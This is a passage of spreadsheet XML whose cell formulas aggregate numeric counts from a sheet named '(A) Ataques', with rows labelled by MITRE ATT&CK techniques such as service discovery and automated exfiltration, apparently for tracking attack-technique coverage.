        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BP7,"")</f>
        <v>1</v>
      </c>
      <c r="R7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BR7,"")</f>
        <v>1</v>
      </c>
      <c r="S7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BS7,"")</f>
        <v>1</v>
      </c>
      <c r="T7" s="530">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($P7=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BT7,"")</f>
        <v>1</v>
      </c>
      <c r="V7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BV7,"")</f>
        <v>1</v>
      </c>
      <c r="W7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BX7,"")</f>
        <v>1</v>
      </c>
      <c r="X7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$BY7,"")</f>
        <v>1</v>
      </c>
      <c r="Y7" s="532">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($U7=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z7" s="288">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!BZ7,"")</f>
        <v>4</v>
      </c>
      <c r="AA7" s="392">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!CB7,"")</f>
        <v>2</v>
      </c>
      <c r="AB7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!CD7,"")</f>
        <v>2</v>
      </c>
      <c r="AC7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!CE7,"")</f>
        <v>1</v>
      </c>
      <c r="AD7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF(Z7=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CF7,"")</f>
        <v>5</v>
      </c>
      <c r="AF7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CH7,"")</f>
        <v>3</v>
      </c>
      <c r="AG7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CJ7,"")</f>
        <v>3</v>
      </c>
      <c r="AH7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CK7,"")</f>
        <v>1</v>
      </c>
      <c r="AI7" s="287">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($AE7=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ7" s="292">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CL7,"")</f>
        <v>0</v>
      </c>
      <c r="AK7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CN7,"")</f>
        <v>0</v>
      </c>
      <c r="AL7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CP7,"")</f>
        <v>0</v>
      </c>
      <c r="AM7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CQ7,"")</f>
        <v>0</v>
      </c>
      <c r="AN7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($AJ7=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CR7,"")</f>
        <v>0</v>
      </c>
      <c r="AP7" s="322">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CT7,"")</f>
        <v>0</v>
      </c>
      <c r="AQ7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CV7,"")</f>
        <v>0</v>
      </c>
      <c r="AR7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!$CW7,"")</f>
        <v>0</v>
      </c>
      <c r="AS7" s="287">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($AO7=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT7" s="288">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!CX7,"")</f>
        <v>1</v>
      </c>
      <c r="AU7" s="392">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!CZ7,"")</f>
        <v>1</v>
      </c>
      <c r="AV7" s="4">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!DB7,"")</f>
        <v>1</v>
      </c>
      <c r="AW7" s="20">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",'(A) Ataques'!DC7,"")</f>
        <v>1</v>
      </c>
      <c r="AX7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($AT7=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY7" s="469">
        <f>'(A) Ataques'!LU7+'(A) Ataques'!MA7+'(A) Ataques'!MG7+'(A) Ataques'!MM7+'(A) Ataques'!MS7</f>
        <v>0</v>
      </c>
      <c r="AZ7" s="510">
        <f>'(A) Ataques'!LW7+'(A) Ataques'!MC7+'(A) Ataques'!MI7+'(A) Ataques'!MO7+'(A) Ataques'!MU7</f>
        <v>0</v>
      </c>
      <c r="BA7" s="471">
        <f>'(A) Ataques'!LY7+'(A) Ataques'!ME7+'(A) Ataques'!MK7+'(A) Ataques'!MQ7+'(A) Ataques'!MW7</f>
        <v>0</v>
      </c>
      <c r="BB7" s="471">
        <f>'(A) Ataques'!LQ7</f>
        <v>0</v>
      </c>
      <c r="BC7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($AY7=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD7" s="469">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!LL7,"")</f>
        <v>0</v>
      </c>
      <c r="BE7" s="510">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!LM7,"")</f>
        <v>0</v>
      </c>
      <c r="BF7" s="471">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!LN7,"")</f>
        <v>0</v>
      </c>
      <c r="BG7" s="471">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!LO7,"")</f>
        <v>0</v>
      </c>
      <c r="BH7" s="471">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!LS7,"")</f>
        <v>0</v>
      </c>
      <c r="BI7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($BD7=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BJ7" s="469">
        <f>'(A) Ataques'!OL7+'(A) Ataques'!OR7+'(A) Ataques'!OX7+'(A) Ataques'!PD7+'(A) Ataques'!PJ7</f>
        <v>0</v>
      </c>
      <c r="BK7" s="510">
        <f>'(A) Ataques'!ON7+'(A) Ataques'!OT7+'(A) Ataques'!OZ7+'(A) Ataques'!PF7+'(A) Ataques'!PL7</f>
        <v>0</v>
      </c>
      <c r="BL7" s="471">
        <f>'(A) Ataques'!OP7+'(A) Ataques'!OV7+'(A) Ataques'!PB7+'(A) Ataques'!PH7+'(A) Ataques'!PN7</f>
        <v>0</v>
      </c>
      <c r="BM7" s="495">
        <f>'(A) Ataques'!OH7</f>
        <v>0</v>
      </c>
      <c r="BN7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($BJ7=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO7" s="469">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!OC7,"")</f>
        <v>0</v>
      </c>
      <c r="BP7" s="510">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!OD7,"")</f>
        <v>0</v>
      </c>
      <c r="BQ7" s="471">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!OE7,"")</f>
        <v>0</v>
      </c>
      <c r="BR7" s="471">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!OF7,"")</f>
        <v>0</v>
      </c>
      <c r="BS7" s="471">
        <f>IF('(A) Ataques'!$AP7&lt;&gt;"NO",'(A) Ataques'!OJ7,"")</f>
        <v>0</v>
      </c>
      <c r="BT7" s="331">
        <f>IF('(A) Ataques'!$AK7&lt;&gt;"NO",IF($BO7=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A8" s="79">
        <f t="shared" si="0"/>
        <v>6</v>
      </c>
      <c r="B8" s="4">
        <f>IF('(A) Ataques'!AK8&lt;&gt;"NO",'(A) Ataques'!E8,"")</f>
        <v>5</v>
      </c>
      <c r="C8" s="6" t="str">
        <f>IF('(A) Ataques'!AK8&lt;&gt;"NO",IF('(A) Ataques'!M8="","",'(A) Ataques'!M8),"")</f>
        <v>T1018-Service_discovery</v>
      </c>
      <c r="D8" s="4" t="str">
        <f>IF('(A) Ataques'!AK8&lt;&gt;"NO",'(A) Ataques'!F8,"")</f>
        <v>T1018</v>
      </c>
      <c r="E8" s="286">
        <f>IF('(A) Ataques'!AK8&lt;&gt;"NO",'(A) Ataques'!AQ8,"")</f>
        <v>1002</v>
      </c>
      <c r="F8" s="288">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!BB8,"")</f>
        <v>0</v>
      </c>
      <c r="G8" s="392">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!BD8,"")</f>
        <v>0</v>
      </c>
      <c r="H8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!BF8,"")</f>
        <v>0</v>
      </c>
      <c r="I8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!BG8,"")</f>
        <v>0</v>
      </c>
      <c r="J8" s="530">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($F8=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BH8,"")</f>
        <v>6</v>
      </c>
      <c r="L8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BJ8,"")</f>
        <v>6</v>
      </c>
      <c r="M8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BL8,"")</f>
        <v>6</v>
      </c>
      <c r="N8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BM8,"")</f>
        <v>6</v>
      </c>
      <c r="O8" s="532">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($K8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P8" s="292">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BN8,"")</f>
        <v>6</v>
      </c>
      <c r="Q8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BP8,"")</f>
        <v>6</v>
      </c>
      <c r="R8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BR8,"")</f>
        <v>6</v>
      </c>
      <c r="S8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BS8,"")</f>
        <v>6</v>
      </c>
      <c r="T8" s="530">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($P8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BT8,"")</f>
        <v>2</v>
      </c>
      <c r="V8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BV8,"")</f>
        <v>2</v>
      </c>
      <c r="W8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BX8,"")</f>
        <v>2</v>
      </c>
      <c r="X8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$BY8,"")</f>
        <v>2</v>
      </c>
      <c r="Y8" s="532">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($U8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z8" s="288">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!BZ8,"")</f>
        <v>11</v>
      </c>
      <c r="AA8" s="392">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!CB8,"")</f>
        <v>9</v>
      </c>
      <c r="AB8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!CD8,"")</f>
        <v>9</v>
      </c>
      <c r="AC8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!CE8,"")</f>
        <v>8</v>
      </c>
      <c r="AD8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF(Z8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CF8,"")</f>
        <v>13</v>
      </c>
      <c r="AF8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CH8,"")</f>
        <v>11</v>
      </c>
      <c r="AG8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CJ8,"")</f>
        <v>11</v>
      </c>
      <c r="AH8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CK8,"")</f>
        <v>9</v>
      </c>
      <c r="AI8" s="287">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($AE8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ8" s="292">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CL8,"")</f>
        <v>0</v>
      </c>
      <c r="AK8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CN8,"")</f>
        <v>0</v>
      </c>
      <c r="AL8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CP8,"")</f>
        <v>0</v>
      </c>
      <c r="AM8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CQ8,"")</f>
        <v>0</v>
      </c>
      <c r="AN8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($AJ8=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CR8,"")</f>
        <v>2</v>
      </c>
      <c r="AP8" s="322">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CT8,"")</f>
        <v>2</v>
      </c>
      <c r="AQ8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CV8,"")</f>
        <v>2</v>
      </c>
      <c r="AR8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!$CW8,"")</f>
        <v>2</v>
      </c>
      <c r="AS8" s="287">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($AO8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT8" s="288">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!CX8,"")</f>
        <v>8</v>
      </c>
      <c r="AU8" s="392">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!CZ8,"")</f>
        <v>8</v>
      </c>
      <c r="AV8" s="4">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!DB8,"")</f>
        <v>8</v>
      </c>
      <c r="AW8" s="20">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",'(A) Ataques'!DC8,"")</f>
        <v>8</v>
      </c>
      <c r="AX8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($AT8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY8" s="469">
        <f>'(A) Ataques'!LU8+'(A) Ataques'!MA8+'(A) Ataques'!MG8+'(A) Ataques'!MM8+'(A) Ataques'!MS8</f>
        <v>6</v>
      </c>
      <c r="AZ8" s="510">
        <f>'(A) Ataques'!LW8+'(A) Ataques'!MC8+'(A) Ataques'!MI8+'(A) Ataques'!MO8+'(A) Ataques'!MU8</f>
        <v>6</v>
      </c>
      <c r="BA8" s="471">
        <f>'(A) Ataques'!LY8+'(A) Ataques'!ME8+'(A) Ataques'!MK8+'(A) Ataques'!MQ8+'(A) Ataques'!MW8</f>
        <v>1</v>
      </c>
      <c r="BB8" s="471">
        <f>'(A) Ataques'!LQ8</f>
        <v>6</v>
      </c>
      <c r="BC8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($AY8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD8" s="469">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!LL8,"")</f>
        <v>6</v>
      </c>
      <c r="BE8" s="510">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!LM8,"")</f>
        <v>6</v>
      </c>
      <c r="BF8" s="471">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!LN8,"")</f>
        <v>1</v>
      </c>
      <c r="BG8" s="471">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!LO8,"")</f>
        <v>0</v>
      </c>
      <c r="BH8" s="471">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!LS8,"")</f>
        <v>6</v>
      </c>
      <c r="BI8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($BD8=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ8" s="469">
        <f>'(A) Ataques'!OL8+'(A) Ataques'!OR8+'(A) Ataques'!OX8+'(A) Ataques'!PD8+'(A) Ataques'!PJ8</f>
        <v>0</v>
      </c>
      <c r="BK8" s="510">
        <f>'(A) Ataques'!ON8+'(A) Ataques'!OT8+'(A) Ataques'!OZ8+'(A) Ataques'!PF8+'(A) Ataques'!PL8</f>
        <v>0</v>
      </c>
      <c r="BL8" s="471">
        <f>'(A) Ataques'!OP8+'(A) Ataques'!OV8+'(A) Ataques'!PB8+'(A) Ataques'!PH8+'(A) Ataques'!PN8</f>
        <v>0</v>
      </c>
      <c r="BM8" s="495">
        <f>'(A) Ataques'!OH8</f>
        <v>0</v>
      </c>
      <c r="BN8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($BJ8=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO8" s="469">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!OC8,"")</f>
        <v>0</v>
      </c>
      <c r="BP8" s="510">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!OD8,"")</f>
        <v>0</v>
      </c>
      <c r="BQ8" s="471">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!OE8,"")</f>
        <v>0</v>
      </c>
      <c r="BR8" s="471">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!OF8,"")</f>
        <v>0</v>
      </c>
      <c r="BS8" s="471">
        <f>IF('(A) Ataques'!$AP8&lt;&gt;"NO",'(A) Ataques'!OJ8,"")</f>
        <v>0</v>
      </c>
      <c r="BT8" s="331">
        <f>IF('(A) Ataques'!$AK8&lt;&gt;"NO",IF($BO8=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A9" s="79">
        <f t="shared" si="0"/>
        <v>7</v>
      </c>
      <c r="B9" s="4">
        <f>IF('(A) Ataques'!AK9&lt;&gt;"NO",'(A) Ataques'!E9,"")</f>
        <v>6</v>
      </c>
      <c r="C9" s="6" t="str">
        <f>IF('(A) Ataques'!AK9&lt;&gt;"NO",IF('(A) Ataques'!M9="","",'(A) Ataques'!M9),"")</f>
        <v>T1020.001-Automated_exfiltration_traffic_duplication</v>
      </c>
      <c r="D9" s="4" t="str">
        <f>IF('(A) Ataques'!AK9&lt;&gt;"NO",'(A) Ataques'!F9,"")</f>
        <v>T1020</v>
      </c>
      <c r="E9" s="286">
        <f>IF('(A) Ataques'!AK9&lt;&gt;"NO",'(A) Ataques'!AQ9,"")</f>
        <v>26</v>
      </c>
      <c r="F9" s="288">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!BB9,"")</f>
        <v>11</v>
      </c>
      <c r="G9" s="392">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!BD9,"")</f>
        <v>2</v>
      </c>
      <c r="H9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!BF9,"")</f>
        <v>1</v>
      </c>
      <c r="I9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!BG9,"")</f>
        <v>2</v>
      </c>
      <c r="J9" s="530">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($F9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BH9,"")</f>
        <v>6</v>
      </c>
      <c r="L9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BJ9,"")</f>
        <v>1</v>
      </c>
      <c r="M9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BL9,"")</f>
        <v>1</v>
      </c>
      <c r="N9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BM9,"")</f>
        <v>1</v>
      </c>
      <c r="O9" s="532">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($K9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P9" s="292">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BN9,"")</f>
        <v>17</v>
      </c>
      <c r="Q9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BP9,"")</f>
        <v>3</v>
      </c>
      <c r="R9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BR9,"")</f>
        <v>2</v>
      </c>
      <c r="S9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BS9,"")</f>
        <v>3</v>
      </c>
      <c r="T9" s="530">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($P9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BT9,"")</f>
        <v>39</v>
      </c>
      <c r="V9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BV9,"")</f>
        <v>3</v>
      </c>
      <c r="W9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BX9,"")</f>
        <v>2</v>
      </c>
      <c r="X9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$BY9,"")</f>
        <v>3</v>
      </c>
      <c r="Y9" s="532">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($U9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z9" s="288">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!BZ9,"")</f>
        <v>16</v>
      </c>
      <c r="AA9" s="392">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!CB9,"")</f>
        <v>9</v>
      </c>
      <c r="AB9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!CD9,"")</f>
        <v>3</v>
      </c>
      <c r="AC9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!CE9,"")</f>
        <v>7</v>
      </c>
      <c r="AD9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF(Z9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CF9,"")</f>
        <v>55</v>
      </c>
      <c r="AF9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CH9,"")</f>
        <v>12</v>
      </c>
      <c r="AG9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CJ9,"")</f>
        <v>5</v>
      </c>
      <c r="AH9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CK9,"")</f>
        <v>9</v>
      </c>
      <c r="AI9" s="287">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($AE9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ9" s="292">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CL9,"")</f>
        <v>0</v>
      </c>
      <c r="AK9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CN9,"")</f>
        <v>0</v>
      </c>
      <c r="AL9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CP9,"")</f>
        <v>0</v>
      </c>
      <c r="AM9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CQ9,"")</f>
        <v>0</v>
      </c>
      <c r="AN9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($AJ9=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CR9,"")</f>
        <v>28</v>
      </c>
      <c r="AP9" s="322">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CT9,"")</f>
        <v>1</v>
      </c>
      <c r="AQ9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CV9,"")</f>
        <v>1</v>
      </c>
      <c r="AR9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!$CW9,"")</f>
        <v>1</v>
      </c>
      <c r="AS9" s="287">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($AO9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT9" s="288">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!CX9,"")</f>
        <v>45</v>
      </c>
      <c r="AU9" s="392">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!CZ9,"")</f>
        <v>4</v>
      </c>
      <c r="AV9" s="4">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!DB9,"")</f>
        <v>3</v>
      </c>
      <c r="AW9" s="20">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",'(A) Ataques'!DC9,"")</f>
        <v>4</v>
      </c>
      <c r="AX9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($AT9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY9" s="469">
        <f>'(A) Ataques'!LU9+'(A) Ataques'!MA9+'(A) Ataques'!MG9+'(A) Ataques'!MM9+'(A) Ataques'!MS9</f>
        <v>1</v>
      </c>
      <c r="AZ9" s="510">
        <f>'(A) Ataques'!LW9+'(A) Ataques'!MC9+'(A) Ataques'!MI9+'(A) Ataques'!MO9+'(A) Ataques'!MU9</f>
        <v>1</v>
      </c>
      <c r="BA9" s="471">
        <f>'(A) Ataques'!LY9+'(A) Ataques'!ME9+'(A) Ataques'!MK9+'(A) Ataques'!MQ9+'(A) Ataques'!MW9</f>
        <v>1</v>
      </c>
      <c r="BB9" s="471">
        <f>'(A) Ataques'!LQ9</f>
        <v>1</v>
      </c>
      <c r="BC9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($AY9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD9" s="469">
